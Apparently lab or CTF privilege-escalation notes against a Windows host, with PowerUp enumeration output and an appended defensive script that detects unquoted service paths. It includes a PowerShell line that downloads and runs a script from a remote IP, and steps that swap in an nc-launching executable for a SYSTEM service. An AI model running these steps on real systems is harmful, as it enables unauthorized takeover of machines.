
Priv Esc

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.50.102.164/PowerUp.ps1');Invoke-Allchecks"
Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2112
ProcessId   : 788
Name        : 788
Check       : Process Token Privileges

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer; IdentityReference=BUILTIN\Users; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System 
                 Explorer\service\SystemExplorerService64.exe; IdentityReference=BUILTIN\Users; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName                     : SystemExplorerHelpService
Path                            : C:\Program Files (x86)\System Explorer\System 
                                  Explorer\service\SystemExplorerService64.exe
ModifiableFile                  : C:\Program Files (x86)\System Explorer\System 
                                  Explorer\service\SystemExplorerService64.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'SystemExplorerHelpService'
CanRestart                      : True
Name                            : SystemExplorerHelpService
Check                           : Modifiable Service Files

ModifiablePath    : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
IdentityReference : WREATH-PC\Thomas
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe; 
                 IdentityReference=BUILTIN\Users; Permissions=System.Object[]}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Compiled a malicious executable to run nc:

copy C:\Users\Thomas\Documents\System.exe "C:\Program Files (x86)\System Explorer\"
sc stop SystemExplorerHelpService
sc start SystemExplorerHelpService
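
A defender-side check for the "Unquoted Service Paths" finding above, added here as an example and not part of the original notes: it lists the locations Windows tries before the real binary when a service ImagePath is unquoted, and produces the quoted form that removes the ambiguity. The function names are hypothetical and the second sample path is constructed.

```powershell
# Added example, not from the original notes.
function Get-UnquotedPathCandidate {
    param([Parameter(Mandatory)][string]$ImagePath)

    $p = $ImagePath.Trim()
    if ($p.StartsWith('"')) { return }             # quoted: parsed unambiguously

    # Keep only the executable part so spaces in arguments are ignored.
    if ($p -notmatch '^(.*?\.exe)(\s|$)') { return }
    $exe = $Matches[1]

    # Every space is a point where the path can be cut and ".exe" appended.
    $idx = $exe.IndexOf(' ')
    while ($idx -ge 0) {
        $exe.Substring(0, $idx) + '.exe'
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
}

function Get-QuotedImagePath {
    param([Parameter(Mandatory)][string]$ImagePath)

    $p = $ImagePath.Trim()
    if ($p.StartsWith('"') -or $p -notmatch '^(.*?\.exe)(\s.*)?$') { return $p }
    # Quote the executable, keep any arguments as they were.
    '"{0}"{1}' -f $Matches[1], $Matches[2]
}

$samples = @(
    # ImagePath reported by PowerUp above
    'C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe',
    # Constructed sample: already quoted, so nothing is reported
    '"C:\Program Files\Example\svc.exe" -k run'
)

$samples | ForEach-Object {
    $candidates = @(Get-UnquotedPathCandidate $_)
    [pscustomobject]@{
        ImagePath  = $_
        Unquoted   = $candidates.Count -gt 0
        Candidates = $candidates -join '; '
        Quoted     = Get-QuotedImagePath $_
    }
} | Format-List

# Live audit on a host (Win32_Service exposes the ImagePath as PathName):
# Get-CimInstance Win32_Service | Where-Object PathName |
#     ForEach-Object { Get-UnquotedPathCandidate $_.PathName }
```

Each directory that would hold a listed candidate must not be writable by low-privileged groups; in the PowerUp output above, `BUILTIN\Users` could write to both `C:\` and `C:\Program Files (x86)\System Explorer`. The quoted value belongs in the service's `ImagePath` under `HKLM:\SYSTEM\CurrentControlSet\Services\<service name>`.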
